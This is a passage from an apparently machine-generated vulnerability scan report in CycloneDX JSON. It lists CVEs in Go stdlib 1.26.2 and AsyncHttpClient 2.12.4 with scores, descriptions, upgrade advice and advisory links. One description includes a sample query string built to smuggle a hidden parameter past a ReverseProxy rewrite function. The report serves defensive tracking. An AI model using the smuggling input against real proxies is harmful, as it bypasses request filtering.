          "ref": "pkg:golang/stdlib@v1.26.2",
          "versions": [
            {
              "version": "v1.26.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:golang/stdlib@v1.26.2",
          "versions": [
            {
              "version": "v1.26.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#03e694fc-d558-4767-829d-476067d21d27"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#03e694fc-d558-4767-829d-476067d21d27"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:golang/stdlib@v1.26.2"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:golang/stdlib@v1.26.2"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#bfc8d26f-8f21-4567-9644-2df9ef7be749"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#bfc8d26f-8f21-4567-9644-2df9ef7be749"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#342b5a22-4d6a-48c4-ac99-7dc5bd483e33"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#342b5a22-4d6a-48c4-ac99-7dc5bd483e33"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#86be76e0-5082-482f-8cd2-021a6b908a2d"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#86be76e0-5082-482f-8cd2-021a6b908a2d"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#8fd2441f-485f-48d4-87e6-88ee68170c78"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#8fd2441f-485f-48d4-87e6-88ee68170c78"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#243ba180-3ca7-4c1e-8f97-3a055559f069"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#243ba180-3ca7-4c1e-8f97-3a055559f069"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#77c64883-13a5-4a9e-9193-b852dded3040"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#77c64883-13a5-4a9e-9193-b852dded3040"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#024e5643-b5d1-497d-a176-16df16107f8f"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#024e5643-b5d1-497d-a176-16df16107f8f"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#9059d290-89bc-43aa-9fb0-6dce2d46493d"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#9059d290-89bc-43aa-9fb0-6dce2d46493d"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#08305b0a-6ce8-42a6-bf08-1c9d8ccba213"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#08305b0a-6ce8-42a6-bf08-1c9d8ccba213"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#07489459-3dfe-4578-adec-33c28eb9f4a5"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#07489459-3dfe-4578-adec-33c28eb9f4a5"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#3c00f8ec-273d-4711-93a2-9e2f61201ec5"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#3c00f8ec-273d-4711-93a2-9e2f61201ec5"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-39823",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
        }
      ],
      "description": "CVE-2026-27142 fixed a vulnerability in which URLs were not correctly escaped inside of a <meta> tag's <content> attribute. If the URL content were to insert ASCII whitespaces around the '=' rune inside of the <content> attribute, the escaper would fail to similarly escape it, leading to XSS.",
      "recommendation": "Upgrade stdlib to version 1.25.10, 1.26.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-39823"
        },
        {
          "url": "https://go.dev/cl/769920"
        },
        {
          "url": "https://go.dev/issue/78913"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39823"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-4982"
        }
      ],
      "published": "2026-05-07T20:16:43+00:00",
      "updated": "2026-05-08T15:16:37+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.2",
          "versions": [
            {
              "version": "v1.26.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:golang/stdlib@v1.26.2",
          "versions": [
            {
              "version": "v1.26.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#03e694fc-d558-4767-829d-476067d21d27"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#03e694fc-d558-4767-829d-476067d21d27"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:golang/stdlib@v1.26.2"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:golang/stdlib@v1.26.2"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#bfc8d26f-8f21-4567-9644-2df9ef7be749"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#bfc8d26f-8f21-4567-9644-2df9ef7be749"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#342b5a22-4d6a-48c4-ac99-7dc5bd483e33"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#342b5a22-4d6a-48c4-ac99-7dc5bd483e33"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#86be76e0-5082-482f-8cd2-021a6b908a2d"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#86be76e0-5082-482f-8cd2-021a6b908a2d"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#8fd2441f-485f-48d4-87e6-88ee68170c78"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#8fd2441f-485f-48d4-87e6-88ee68170c78"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#243ba180-3ca7-4c1e-8f97-3a055559f069"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#243ba180-3ca7-4c1e-8f97-3a055559f069"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#77c64883-13a5-4a9e-9193-b852dded3040"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#77c64883-13a5-4a9e-9193-b852dded3040"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#024e5643-b5d1-497d-a176-16df16107f8f"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#024e5643-b5d1-497d-a176-16df16107f8f"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#9059d290-89bc-43aa-9fb0-6dce2d46493d"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#9059d290-89bc-43aa-9fb0-6dce2d46493d"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#08305b0a-6ce8-42a6-bf08-1c9d8ccba213"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#08305b0a-6ce8-42a6-bf08-1c9d8ccba213"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#07489459-3dfe-4578-adec-33c28eb9f4a5"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#07489459-3dfe-4578-adec-33c28eb9f4a5"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#3c00f8ec-273d-4711-93a2-9e2f61201ec5"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#3c00f8ec-273d-4711-93a2-9e2f61201ec5"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-39825",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        }
      ],
      "description": "ReverseProxy can forward queries containing parameters not visible to Rewrite functions. When used with a Rewrite function, or a Director function which parses query parameters, ReverseProxy sanitizes the forwarded request to remove query parameters which are not parsed by url.ParseQuery. ReverseProxy does not take ParseQuery's limit on the total number of query parameters (controlled by GODEBUG=urlmaxqueryparams=N) into account. This can permit ReverseProxy to forward a request containing a query parameter that is not visible to the Rewrite function. For example, the query \"a1=x&a2=x&...&a10000=x&hidden=y\" can forward the parameter \"hidden=y\" while hiding it from the proxy's Rewrite function.",
      "recommendation": "Upgrade stdlib to version 1.25.10, 1.26.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-39825"
        },
        {
          "url": "https://go.dev/cl/770541"
        },
        {
          "url": "https://go.dev/issue/78948"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39825"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-4976"
        }
      ],
      "published": "2026-05-07T20:16:43+00:00",
      "updated": "2026-05-08T22:16:29+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.2",
          "versions": [
            {
              "version": "v1.26.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:golang/stdlib@v1.26.2",
          "versions": [
            {
              "version": "v1.26.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#03e694fc-d558-4767-829d-476067d21d27"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#03e694fc-d558-4767-829d-476067d21d27"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:golang/stdlib@v1.26.2"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:golang/stdlib@v1.26.2"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#bfc8d26f-8f21-4567-9644-2df9ef7be749"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#bfc8d26f-8f21-4567-9644-2df9ef7be749"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#342b5a22-4d6a-48c4-ac99-7dc5bd483e33"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#342b5a22-4d6a-48c4-ac99-7dc5bd483e33"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#86be76e0-5082-482f-8cd2-021a6b908a2d"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#86be76e0-5082-482f-8cd2-021a6b908a2d"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#8fd2441f-485f-48d4-87e6-88ee68170c78"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#8fd2441f-485f-48d4-87e6-88ee68170c78"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#243ba180-3ca7-4c1e-8f97-3a055559f069"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#243ba180-3ca7-4c1e-8f97-3a055559f069"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#77c64883-13a5-4a9e-9193-b852dded3040"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#77c64883-13a5-4a9e-9193-b852dded3040"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#024e5643-b5d1-497d-a176-16df16107f8f"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#024e5643-b5d1-497d-a176-16df16107f8f"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#9059d290-89bc-43aa-9fb0-6dce2d46493d"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#9059d290-89bc-43aa-9fb0-6dce2d46493d"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#08305b0a-6ce8-42a6-bf08-1c9d8ccba213"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#08305b0a-6ce8-42a6-bf08-1c9d8ccba213"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#07489459-3dfe-4578-adec-33c28eb9f4a5"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#07489459-3dfe-4578-adec-33c28eb9f4a5"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#3c00f8ec-273d-4711-93a2-9e2f61201ec5"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#3c00f8ec-273d-4711-93a2-9e2f61201ec5"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-39826",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
        }
      ],
      "description": "If a trusted template author were to write a <script> tag containing an empty 'type' attribute or a 'type' attribute with an ASCII whitespace, the execution of the template would incorrectly escape any data passed into the <script> block.",
      "recommendation": "Upgrade stdlib to version 1.25.10, 1.26.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-39826"
        },
        {
          "url": "https://go.dev/cl/771180"
        },
        {
          "url": "https://go.dev/issue/78981"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39826"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-4980"
        }
      ],
      "published": "2026-05-07T20:16:43+00:00",
      "updated": "2026-05-08T15:16:37+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.2",
          "versions": [
            {
              "version": "v1.26.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:golang/stdlib@v1.26.2",
          "versions": [
            {
              "version": "v1.26.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#03e694fc-d558-4767-829d-476067d21d27"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#03e694fc-d558-4767-829d-476067d21d27"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:golang/stdlib@v1.26.2"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:golang/stdlib@v1.26.2"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#bfc8d26f-8f21-4567-9644-2df9ef7be749"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#bfc8d26f-8f21-4567-9644-2df9ef7be749"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#342b5a22-4d6a-48c4-ac99-7dc5bd483e33"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#342b5a22-4d6a-48c4-ac99-7dc5bd483e33"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#86be76e0-5082-482f-8cd2-021a6b908a2d"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#86be76e0-5082-482f-8cd2-021a6b908a2d"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#8fd2441f-485f-48d4-87e6-88ee68170c78"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#8fd2441f-485f-48d4-87e6-88ee68170c78"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#243ba180-3ca7-4c1e-8f97-3a055559f069"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#243ba180-3ca7-4c1e-8f97-3a055559f069"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#77c64883-13a5-4a9e-9193-b852dded3040"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#77c64883-13a5-4a9e-9193-b852dded3040"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#024e5643-b5d1-497d-a176-16df16107f8f"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#024e5643-b5d1-497d-a176-16df16107f8f"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#9059d290-89bc-43aa-9fb0-6dce2d46493d"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#9059d290-89bc-43aa-9fb0-6dce2d46493d"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#08305b0a-6ce8-42a6-bf08-1c9d8ccba213"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#08305b0a-6ce8-42a6-bf08-1c9d8ccba213"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#07489459-3dfe-4578-adec-33c28eb9f4a5"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#07489459-3dfe-4578-adec-33c28eb9f4a5"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#3c00f8ec-273d-4711-93a2-9e2f61201ec5"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#3c00f8ec-273d-4711-93a2-9e2f61201ec5"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-39836",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "description": "The Dial and LookupPort functions panic on Windows when provided with an input containing a NUL (0).",
      "recommendation": "Upgrade stdlib to version 1.25.10, 1.26.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-39836"
        },
        {
          "url": "https://go.dev/cl/775320"
        },
        {
          "url": "https://go.dev/issue/79006"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39836"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-4971"
        }
      ],
      "published": "2026-05-07T20:16:43+00:00",
      "updated": "2026-05-08T22:16:29+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.2",
          "versions": [
            {
              "version": "v1.26.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:golang/stdlib@v1.26.2",
          "versions": [
            {
              "version": "v1.26.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#03e694fc-d558-4767-829d-476067d21d27"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#03e694fc-d558-4767-829d-476067d21d27"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:golang/stdlib@v1.26.2"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:golang/stdlib@v1.26.2"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#bfc8d26f-8f21-4567-9644-2df9ef7be749"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#bfc8d26f-8f21-4567-9644-2df9ef7be749"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#342b5a22-4d6a-48c4-ac99-7dc5bd483e33"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#342b5a22-4d6a-48c4-ac99-7dc5bd483e33"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#86be76e0-5082-482f-8cd2-021a6b908a2d"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#86be76e0-5082-482f-8cd2-021a6b908a2d"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#8fd2441f-485f-48d4-87e6-88ee68170c78"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#8fd2441f-485f-48d4-87e6-88ee68170c78"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#243ba180-3ca7-4c1e-8f97-3a055559f069"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#243ba180-3ca7-4c1e-8f97-3a055559f069"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#77c64883-13a5-4a9e-9193-b852dded3040"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#77c64883-13a5-4a9e-9193-b852dded3040"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#024e5643-b5d1-497d-a176-16df16107f8f"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#024e5643-b5d1-497d-a176-16df16107f8f"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#9059d290-89bc-43aa-9fb0-6dce2d46493d"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#9059d290-89bc-43aa-9fb0-6dce2d46493d"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#08305b0a-6ce8-42a6-bf08-1c9d8ccba213"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#08305b0a-6ce8-42a6-bf08-1c9d8ccba213"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#07489459-3dfe-4578-adec-33c28eb9f4a5"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#07489459-3dfe-4578-adec-33c28eb9f4a5"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#3c00f8ec-273d-4711-93a2-9e2f61201ec5"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#3c00f8ec-273d-4711-93a2-9e2f61201ec5"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-40490",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 6.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N"
        }
      ],
      "cwes": [
        200
      ],
      "description": "The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses. When redirect following is enabled (followRedirect(true)), versions of AsyncHttpClient prior to 3.0.9 and 2.14.5 forward Authorization and Proxy-Authorization headers along with Realm credentials to arbitrary redirect targets regardless of domain, scheme, or port changes. This leaks credentials on cross-domain redirects and HTTPS-to-HTTP downgrades. Additionally, even when stripAuthorizationOnRedirect is set to true, the Realm object containing plaintext credentials is still propagated to the redirect request, causing credential re-generation for Basic and Digest authentication schemes via NettyRequestFactory. An attacker who controls a redirect target (via open redirect, DNS rebinding, or MITM on HTTP) can capture Bearer tokens, Basic auth credentials, or any other Authorization header value. The fix in versions 3.0.9 and 2.14.5 automatically strips Authorization and Proxy-Authorization headers and clears Realm credentials whenever a redirect crosses origin boundaries (different scheme, host, or port) or downgrades from HTTPS to HTTP. For users unable to upgrade, set `(stripAuthorizationOnRedirect(true))` in the client config and avoid using Realm-based authentication with redirect following enabled. Note that `(stripAuthorizationOnRedirect(true))` alone is insufficient on versions prior to 3.0.9 and 2.14.5 because the Realm bypass still re-generates credentials. Alternatively, disable redirect following (`followRedirect(false)`) and handle redirects manually with origin validation.",
      "recommendation": "Upgrade org.asynchttpclient:async-http-client to version 3.0.9, 2.14.5",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-40490"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-40490"
        },
        {
          "url": "https://github.com/AsyncHttpClient/async-http-client"
        },
        {
          "url": "https://github.com/AsyncHttpClient/async-http-client/commit/6b2fbb7f8"
        },
        {
          "url": "https://github.com/AsyncHttpClient/async-http-client/commit/ae557ad35246721c09dafb2976609cd0004e78ae"
        },
        {
          "url": "https://github.com/AsyncHttpClient/async-http-client/releases/tag/async-http-client-project-2.14.5"
        },
        {
          "url": "https://github.com/AsyncHttpClient/async-http-client/releases/tag/async-http-client-project-3.0.9"
        },
        {
          "url": "https://github.com/AsyncHttpClient/async-http-client/security/advisories/GHSA-cmxv-58fp-fm3g"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40490"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-40490"
        }
      ],
      "published": "2026-04-18T02:16:11+00:00",
      "updated": "2026-04-20T18:59:16+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.asynchttpclient/async-http-client@2.12.4",
          "versions": [
            {
              "version": "2.12.4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.asynchttpclient/async-http-client@2.12.4",
          "versions": [
            {
              "version": "2.12.4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.asynchttpclient/async-http-client@2.12.4",
          "versions": [
            {
              "version": "2.12.4",
              "status": "affected"
            }
          ]
